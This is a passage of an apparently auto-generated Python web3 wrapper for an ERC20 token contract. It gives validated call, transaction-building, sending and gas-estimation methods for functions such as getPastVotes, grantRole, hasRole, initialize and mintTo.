        account = self.validate_and_checksum_address(account)
        return account

    def call(self, account: str, tx_params: Optional[TxParams] = None) -> str:
        """Invoke the underlying contract method read-only via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        account = self.validate_and_normalize_inputs(account)
        params = super().normalize_tx_params(tx_params).as_dict()
        return str(self._underlying_method(account).call(params))

    def send_transaction(
        self, account: str, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Broadcast the underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        account = self.validate_and_normalize_inputs(account)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(account).transact(params)

    def build_transaction(
        self, account: str, tx_params: Optional[TxParams] = None
    ) -> dict:
        """Assemble calldata suitable for use as input to the method."""
        account = self.validate_and_normalize_inputs(account)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(account).buildTransaction(params)

    def estimate_gas(
        self, account: str, tx_params: Optional[TxParams] = None
    ) -> int:
        """Return an estimate of the gas consumed by the method call."""
        account = self.validate_and_normalize_inputs(account)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(account).estimateGas(params)
class GetPastTotalSupplyMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the getPastTotalSupply method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        # Bound web3 function object used by the accessors below.
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, block_number: int):
        """Check and normalize the arguments to the getPastTotalSupply method."""
        self.validator.assert_valid(
            method_name="getPastTotalSupply",
            parameter_name="blockNumber",
            argument_value=block_number,
        )
        # Coerce to int so a fractional block number cannot slip through.
        block_number = int(block_number)
        return block_number

    def call(
        self, block_number: int, tx_params: Optional[TxParams] = None
    ) -> int:
        """Invoke the underlying contract method read-only via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        block_number = self.validate_and_normalize_inputs(block_number)
        params = super().normalize_tx_params(tx_params).as_dict()
        return int(self._underlying_method(block_number).call(params))

    def send_transaction(
        self, block_number: int, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Broadcast the underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        block_number = self.validate_and_normalize_inputs(block_number)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(block_number).transact(params)

    def build_transaction(
        self, block_number: int, tx_params: Optional[TxParams] = None
    ) -> dict:
        """Assemble calldata suitable for use as input to the method."""
        block_number = self.validate_and_normalize_inputs(block_number)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(block_number).buildTransaction(params)

    def estimate_gas(
        self, block_number: int, tx_params: Optional[TxParams] = None
    ) -> int:
        """Return an estimate of the gas consumed by the method call."""
        block_number = self.validate_and_normalize_inputs(block_number)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(block_number).estimateGas(params)
class GetPastVotesMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the getPastVotes method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        # Bound web3 function object used by the accessors below.
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, account: str, block_number: int):
        """Check and normalize the arguments to the getPastVotes method."""
        self.validator.assert_valid(
            method_name="getPastVotes",
            parameter_name="account",
            argument_value=account,
        )
        account = self.validate_and_checksum_address(account)
        self.validator.assert_valid(
            method_name="getPastVotes",
            parameter_name="blockNumber",
            argument_value=block_number,
        )
        # Coerce to int so a fractional block number cannot slip through.
        block_number = int(block_number)
        return (account, block_number)

    def call(
        self,
        account: str,
        block_number: int,
        tx_params: Optional[TxParams] = None,
    ) -> int:
        """Invoke the underlying contract method read-only via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        account, block_number = self.validate_and_normalize_inputs(
            account, block_number
        )
        params = super().normalize_tx_params(tx_params).as_dict()
        return int(self._underlying_method(account, block_number).call(params))

    def send_transaction(
        self,
        account: str,
        block_number: int,
        tx_params: Optional[TxParams] = None,
    ) -> Union[HexBytes, bytes]:
        """Broadcast the underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        account, block_number = self.validate_and_normalize_inputs(
            account, block_number
        )
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(account, block_number).transact(params)

    def build_transaction(
        self,
        account: str,
        block_number: int,
        tx_params: Optional[TxParams] = None,
    ) -> dict:
        """Assemble calldata suitable for use as input to the method."""
        account, block_number = self.validate_and_normalize_inputs(
            account, block_number
        )
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(account, block_number).buildTransaction(
            params
        )

    def estimate_gas(
        self,
        account: str,
        block_number: int,
        tx_params: Optional[TxParams] = None,
    ) -> int:
        """Return an estimate of the gas consumed by the method call."""
        account, block_number = self.validate_and_normalize_inputs(
            account, block_number
        )
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(account, block_number).estimateGas(
            params
        )
class GetPlatformFeeInfoMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the getPlatformFeeInfo method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address)
        # Bound web3 function object used by the accessors below.
        self._underlying_method = contract_function

    def call(self, tx_params: Optional[TxParams] = None) -> Tuple[str, int]:
        """Invoke the underlying contract method read-only via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        raw = self._underlying_method().call(params)
        # Return the (recipient, bps) pair as a plain tuple.
        return (raw[0], raw[1])

    def send_transaction(
        self, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Broadcast the underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().transact(params)

    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Assemble calldata suitable for use as input to the method."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().buildTransaction(params)

    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Return an estimate of the gas consumed by the method call."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().estimateGas(params)
class GetRoleAdminMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the getRoleAdmin method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data.

        :param web3_or_provider: web3 instance or raw provider for RPC calls
        :param contract_address: address of the deployed contract
        :param contract_function: bound web3 ContractFunction for getRoleAdmin
        :param validator: optional input validator used by the base class
        """
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, role: Union[bytes, str]):
        """Validate the inputs to the getRoleAdmin method.

        :param role: role identifier (bytes32) whose admin role is queried
        """
        self.validator.assert_valid(
            method_name="getRoleAdmin",
            parameter_name="role",
            argument_value=role,
        )
        return role

    def call(
        self, role: Union[bytes, str], tx_params: Optional[TxParams] = None
    ) -> Union[bytes, str]:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the admin role identifier (bytes32) for ``role``.
        """
        (role) = self.validate_and_normalize_inputs(role)
        tx_params = super().normalize_tx_params(tx_params)
        returned = self._underlying_method(role).call(tx_params.as_dict())
        # BUG FIX: the generated code returned ``Union[bytes, str](returned)``,
        # but typing.Union is a special form and is not callable — that line
        # raised ``TypeError`` on every invocation. web3 has already decoded
        # the value, so return it unchanged.
        return returned

    def send_transaction(
        self, role: Union[bytes, str], tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        (role) = self.validate_and_normalize_inputs(role)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(role).transact(tx_params.as_dict())

    def build_transaction(
        self, role: Union[bytes, str], tx_params: Optional[TxParams] = None
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        (role) = self.validate_and_normalize_inputs(role)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(role).buildTransaction(
            tx_params.as_dict()
        )

    def estimate_gas(
        self, role: Union[bytes, str], tx_params: Optional[TxParams] = None
    ) -> int:
        """Estimate gas consumption of method call."""
        (role) = self.validate_and_normalize_inputs(role)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(role).estimateGas(tx_params.as_dict())
class GetRoleMemberMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the getRoleMember method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        # Bound web3 function object used by the accessors below.
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(
        self, role: Union[bytes, str], index: int
    ):
        """Check and normalize the arguments to the getRoleMember method."""
        self.validator.assert_valid(
            method_name="getRoleMember",
            parameter_name="role",
            argument_value=role,
        )
        self.validator.assert_valid(
            method_name="getRoleMember",
            parameter_name="index",
            argument_value=index,
        )
        # Coerce to int so a fractional index cannot slip through.
        index = int(index)
        return (role, index)

    def call(
        self,
        role: Union[bytes, str],
        index: int,
        tx_params: Optional[TxParams] = None,
    ) -> str:
        """Invoke the underlying contract method read-only via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        role, index = self.validate_and_normalize_inputs(role, index)
        params = super().normalize_tx_params(tx_params).as_dict()
        return str(self._underlying_method(role, index).call(params))

    def send_transaction(
        self,
        role: Union[bytes, str],
        index: int,
        tx_params: Optional[TxParams] = None,
    ) -> Union[HexBytes, bytes]:
        """Broadcast the underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        role, index = self.validate_and_normalize_inputs(role, index)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(role, index).transact(params)

    def build_transaction(
        self,
        role: Union[bytes, str],
        index: int,
        tx_params: Optional[TxParams] = None,
    ) -> dict:
        """Assemble calldata suitable for use as input to the method."""
        role, index = self.validate_and_normalize_inputs(role, index)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(role, index).buildTransaction(params)

    def estimate_gas(
        self,
        role: Union[bytes, str],
        index: int,
        tx_params: Optional[TxParams] = None,
    ) -> int:
        """Return an estimate of the gas consumed by the method call."""
        role, index = self.validate_and_normalize_inputs(role, index)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(role, index).estimateGas(params)
class GetRoleMemberCountMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the getRoleMemberCount method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        # Bound web3 function object used by the accessors below.
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, role: Union[bytes, str]):
        """Check and normalize the arguments to the getRoleMemberCount method."""
        self.validator.assert_valid(
            method_name="getRoleMemberCount",
            parameter_name="role",
            argument_value=role,
        )
        return role

    def call(
        self, role: Union[bytes, str], tx_params: Optional[TxParams] = None
    ) -> int:
        """Invoke the underlying contract method read-only via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        role = self.validate_and_normalize_inputs(role)
        params = super().normalize_tx_params(tx_params).as_dict()
        return int(self._underlying_method(role).call(params))

    def send_transaction(
        self, role: Union[bytes, str], tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Broadcast the underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        role = self.validate_and_normalize_inputs(role)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(role).transact(params)

    def build_transaction(
        self, role: Union[bytes, str], tx_params: Optional[TxParams] = None
    ) -> dict:
        """Assemble calldata suitable for use as input to the method."""
        role = self.validate_and_normalize_inputs(role)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(role).buildTransaction(params)

    def estimate_gas(
        self, role: Union[bytes, str], tx_params: Optional[TxParams] = None
    ) -> int:
        """Return an estimate of the gas consumed by the method call."""
        role = self.validate_and_normalize_inputs(role)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(role).estimateGas(params)
class GetVotesMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the getVotes method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, account: str):
        """Validate ``account`` and return its checksummed form."""
        self.validator.assert_valid(
            method_name="getVotes",
            parameter_name="account",
            argument_value=account,
        )
        return self.validate_and_checksum_address(account)

    def call(self, account: str, tx_params: Optional[TxParams] = None) -> int:
        """Read the vote balance via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        account = self.validate_and_normalize_inputs(account)
        params = super().normalize_tx_params(tx_params).as_dict()
        return int(self._underlying_method(account).call(params))

    def send_transaction(
        self, account: str, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Broadcast the method as a transaction via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        account = self.validate_and_normalize_inputs(account)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(account).transact(params)

    def build_transaction(
        self, account: str, tx_params: Optional[TxParams] = None
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        account = self.validate_and_normalize_inputs(account)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(account).buildTransaction(params)

    def estimate_gas(
        self, account: str, tx_params: Optional[TxParams] = None
    ) -> int:
        """Estimate gas consumption of method call."""
        account = self.validate_and_normalize_inputs(account)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(account).estimateGas(params)
class GrantRoleMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the grantRole method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(
        self, role: Union[bytes, str], account: str
    ):
        """Validate ``role`` and ``account``; checksum the account address."""
        # Assert both parameters in declaration order before normalizing,
        # matching the validator's expected call sequence.
        for parameter_name, argument_value in (
            ("role", role),
            ("account", account),
        ):
            self.validator.assert_valid(
                method_name="grantRole",
                parameter_name=parameter_name,
                argument_value=argument_value,
            )
        return role, self.validate_and_checksum_address(account)

    def call(
        self,
        role: Union[bytes, str],
        account: str,
        tx_params: Optional[TxParams] = None,
    ) -> None:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        role, account = self.validate_and_normalize_inputs(role, account)
        params = super().normalize_tx_params(tx_params).as_dict()
        self._underlying_method(role, account).call(params)

    def send_transaction(
        self,
        role: Union[bytes, str],
        account: str,
        tx_params: Optional[TxParams] = None,
    ) -> Union[HexBytes, bytes]:
        """Broadcast the method as a transaction via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        role, account = self.validate_and_normalize_inputs(role, account)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(role, account).transact(params)

    def build_transaction(
        self,
        role: Union[bytes, str],
        account: str,
        tx_params: Optional[TxParams] = None,
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        role, account = self.validate_and_normalize_inputs(role, account)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(role, account).buildTransaction(params)

    def estimate_gas(
        self,
        role: Union[bytes, str],
        account: str,
        tx_params: Optional[TxParams] = None,
    ) -> int:
        """Estimate gas consumption of method call."""
        role, account = self.validate_and_normalize_inputs(role, account)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(role, account).estimateGas(params)
class HasRoleMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the hasRole method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(
        self, role: Union[bytes, str], account: str
    ):
        """Validate ``role`` and ``account``; checksum the account address."""
        # Assert both parameters in declaration order before normalizing.
        for parameter_name, argument_value in (
            ("role", role),
            ("account", account),
        ):
            self.validator.assert_valid(
                method_name="hasRole",
                parameter_name=parameter_name,
                argument_value=argument_value,
            )
        return role, self.validate_and_checksum_address(account)

    def call(
        self,
        role: Union[bytes, str],
        account: str,
        tx_params: Optional[TxParams] = None,
    ) -> bool:
        """Check role membership via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        role, account = self.validate_and_normalize_inputs(role, account)
        params = super().normalize_tx_params(tx_params).as_dict()
        return bool(self._underlying_method(role, account).call(params))

    def send_transaction(
        self,
        role: Union[bytes, str],
        account: str,
        tx_params: Optional[TxParams] = None,
    ) -> Union[HexBytes, bytes]:
        """Broadcast the method as a transaction via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        role, account = self.validate_and_normalize_inputs(role, account)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(role, account).transact(params)

    def build_transaction(
        self,
        role: Union[bytes, str],
        account: str,
        tx_params: Optional[TxParams] = None,
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        role, account = self.validate_and_normalize_inputs(role, account)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(role, account).buildTransaction(params)

    def estimate_gas(
        self,
        role: Union[bytes, str],
        account: str,
        tx_params: Optional[TxParams] = None,
    ) -> int:
        """Estimate gas consumption of method call."""
        role, account = self.validate_and_normalize_inputs(role, account)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(role, account).estimateGas(params)
class IncreaseAllowanceMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the increaseAllowance method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, spender: str, added_value: int):
        """Validate inputs: checksum ``spender``, coerce ``addedValue`` to int."""
        self.validator.assert_valid(
            method_name="increaseAllowance",
            parameter_name="spender",
            argument_value=spender,
        )
        spender = self.validate_and_checksum_address(spender)
        self.validator.assert_valid(
            method_name="increaseAllowance",
            parameter_name="addedValue",
            argument_value=added_value,
        )
        # Truncate so a fractional value never reaches the ABI encoder.
        return spender, int(added_value)

    def call(
        self,
        spender: str,
        added_value: int,
        tx_params: Optional[TxParams] = None,
    ) -> bool:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        spender, added_value = self.validate_and_normalize_inputs(
            spender, added_value
        )
        params = super().normalize_tx_params(tx_params).as_dict()
        return bool(self._underlying_method(spender, added_value).call(params))

    def send_transaction(
        self,
        spender: str,
        added_value: int,
        tx_params: Optional[TxParams] = None,
    ) -> Union[HexBytes, bytes]:
        """Broadcast the method as a transaction via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        spender, added_value = self.validate_and_normalize_inputs(
            spender, added_value
        )
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(spender, added_value).transact(params)

    def build_transaction(
        self,
        spender: str,
        added_value: int,
        tx_params: Optional[TxParams] = None,
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        spender, added_value = self.validate_and_normalize_inputs(
            spender, added_value
        )
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(spender, added_value).buildTransaction(
            params
        )

    def estimate_gas(
        self,
        spender: str,
        added_value: int,
        tx_params: Optional[TxParams] = None,
    ) -> int:
        """Estimate gas consumption of method call."""
        spender, added_value = self.validate_and_normalize_inputs(
            spender, added_value
        )
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(spender, added_value).estimateGas(
            params
        )
class InitializeMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the initialize method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(
        self,
        default_admin: str,
        name: str,
        symbol: str,
        contract_uri: str,
        trusted_forwarders: List[str],
        primary_sale_recipient: str,
        platform_fee_recipient: str,
        platform_fee_bps: int,
    ):
        """Validate the inputs to the initialize method."""

        def checked(parameter_name, argument_value, checksum=False):
            # Assert the parameter first, then (for addresses) checksum it,
            # preserving the original per-parameter validate/normalize order.
            self.validator.assert_valid(
                method_name="initialize",
                parameter_name=parameter_name,
                argument_value=argument_value,
            )
            if checksum:
                return self.validate_and_checksum_address(argument_value)
            return argument_value

        default_admin = checked("_defaultAdmin", default_admin, checksum=True)
        name = checked("_name", name)
        symbol = checked("_symbol", symbol)
        contract_uri = checked("_contractURI", contract_uri)
        trusted_forwarders = checked("_trustedForwarders", trusted_forwarders)
        primary_sale_recipient = checked(
            "_primarySaleRecipient", primary_sale_recipient, checksum=True
        )
        platform_fee_recipient = checked(
            "_platformFeeRecipient", platform_fee_recipient, checksum=True
        )
        platform_fee_bps = checked("_platformFeeBps", platform_fee_bps)
        # Truncate bps so a fractional value never reaches the ABI encoder.
        return (
            default_admin,
            name,
            symbol,
            contract_uri,
            trusted_forwarders,
            primary_sale_recipient,
            platform_fee_recipient,
            int(platform_fee_bps),
        )

    def call(
        self,
        default_admin: str,
        name: str,
        symbol: str,
        contract_uri: str,
        trusted_forwarders: List[str],
        primary_sale_recipient: str,
        platform_fee_recipient: str,
        platform_fee_bps: int,
        tx_params: Optional[TxParams] = None,
    ) -> None:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        args = self.validate_and_normalize_inputs(
            default_admin,
            name,
            symbol,
            contract_uri,
            trusted_forwarders,
            primary_sale_recipient,
            platform_fee_recipient,
            platform_fee_bps,
        )
        params = super().normalize_tx_params(tx_params).as_dict()
        self._underlying_method(*args).call(params)

    def send_transaction(
        self,
        default_admin: str,
        name: str,
        symbol: str,
        contract_uri: str,
        trusted_forwarders: List[str],
        primary_sale_recipient: str,
        platform_fee_recipient: str,
        platform_fee_bps: int,
        tx_params: Optional[TxParams] = None,
    ) -> Union[HexBytes, bytes]:
        """Broadcast the method as a transaction via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        args = self.validate_and_normalize_inputs(
            default_admin,
            name,
            symbol,
            contract_uri,
            trusted_forwarders,
            primary_sale_recipient,
            platform_fee_recipient,
            platform_fee_bps,
        )
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(*args).transact(params)

    def build_transaction(
        self,
        default_admin: str,
        name: str,
        symbol: str,
        contract_uri: str,
        trusted_forwarders: List[str],
        primary_sale_recipient: str,
        platform_fee_recipient: str,
        platform_fee_bps: int,
        tx_params: Optional[TxParams] = None,
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        args = self.validate_and_normalize_inputs(
            default_admin,
            name,
            symbol,
            contract_uri,
            trusted_forwarders,
            primary_sale_recipient,
            platform_fee_recipient,
            platform_fee_bps,
        )
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(*args).buildTransaction(params)

    def estimate_gas(
        self,
        default_admin: str,
        name: str,
        symbol: str,
        contract_uri: str,
        trusted_forwarders: List[str],
        primary_sale_recipient: str,
        platform_fee_recipient: str,
        platform_fee_bps: int,
        tx_params: Optional[TxParams] = None,
    ) -> int:
        """Estimate gas consumption of method call."""
        args = self.validate_and_normalize_inputs(
            default_admin,
            name,
            symbol,
            contract_uri,
            trusted_forwarders,
            primary_sale_recipient,
            platform_fee_recipient,
            platform_fee_bps,
        )
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(*args).estimateGas(params)
class IsTrustedForwarderMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the isTrustedForwarder method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, forwarder: str):
        """Validate ``forwarder`` and return its checksummed form."""
        self.validator.assert_valid(
            method_name="isTrustedForwarder",
            parameter_name="forwarder",
            argument_value=forwarder,
        )
        return self.validate_and_checksum_address(forwarder)

    def call(
        self, forwarder: str, tx_params: Optional[TxParams] = None
    ) -> bool:
        """Query the trusted-forwarder flag via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        forwarder = self.validate_and_normalize_inputs(forwarder)
        params = super().normalize_tx_params(tx_params).as_dict()
        return bool(self._underlying_method(forwarder).call(params))

    def send_transaction(
        self, forwarder: str, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Broadcast the method as a transaction via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        forwarder = self.validate_and_normalize_inputs(forwarder)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(forwarder).transact(params)

    def build_transaction(
        self, forwarder: str, tx_params: Optional[TxParams] = None
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        forwarder = self.validate_and_normalize_inputs(forwarder)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(forwarder).buildTransaction(params)

    def estimate_gas(
        self, forwarder: str, tx_params: Optional[TxParams] = None
    ) -> int:
        """Estimate gas consumption of method call."""
        forwarder = self.validate_and_normalize_inputs(forwarder)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(forwarder).estimateGas(params)
class MintToMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the mintTo method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, to: str, amount: int):
        """Validate inputs: checksum ``to``, coerce ``amount`` to int."""
        self.validator.assert_valid(
            method_name="mintTo",
            parameter_name="to",
            argument_value=to,
        )
        to = self.validate_and_checksum_address(to)
        self.validator.assert_valid(
            method_name="mintTo",
            parameter_name="amount",
            argument_value=amount,
        )
        # Truncate so a fractional amount never reaches the ABI encoder.
        return to, int(amount)

    def call(
        self, to: str, amount: int, tx_params: Optional[TxParams] = None
    ) -> None:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        to, amount = self.validate_and_normalize_inputs(to, amount)
        params = super().normalize_tx_params(tx_params).as_dict()
        self._underlying_method(to, amount).call(params)

    def send_transaction(
        self, to: str, amount: int, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Broadcast the method as a transaction via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        to, amount = self.validate_and_normalize_inputs(to, amount)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(to, amount).transact(params)

    def build_transaction(
        self, to: str, amount: int, tx_params: Optional[TxParams] = None
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        to, amount = self.validate_and_normalize_inputs(to, amount)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(to, amount).buildTransaction(params)

    def estimate_gas(
        self, to: str, amount: int, tx_params: Optional[TxParams] = None
    ) -> int:
        """Estimate gas consumption of method call."""
        to, amount = self.validate_and_normalize_inputs(to, amount)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(to, amount).estimateGas(params)
class MintWithSignatureMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the mintWithSignature method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(
        self, req: ITokenERC20MintRequest, signature: Union[bytes, str]
    ):
        """Validate ``_req`` and ``_signature``; no normalization is needed."""
        for parameter_name, argument_value in (
            ("_req", req),
            ("_signature", signature),
        ):
            self.validator.assert_valid(
                method_name="mintWithSignature",
                parameter_name=parameter_name,
                argument_value=argument_value,
            )
        return req, signature

    def call(
        self,
        req: ITokenERC20MintRequest,
        signature: Union[bytes, str],
        tx_params: Optional[TxParams] = None,
    ) -> None:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
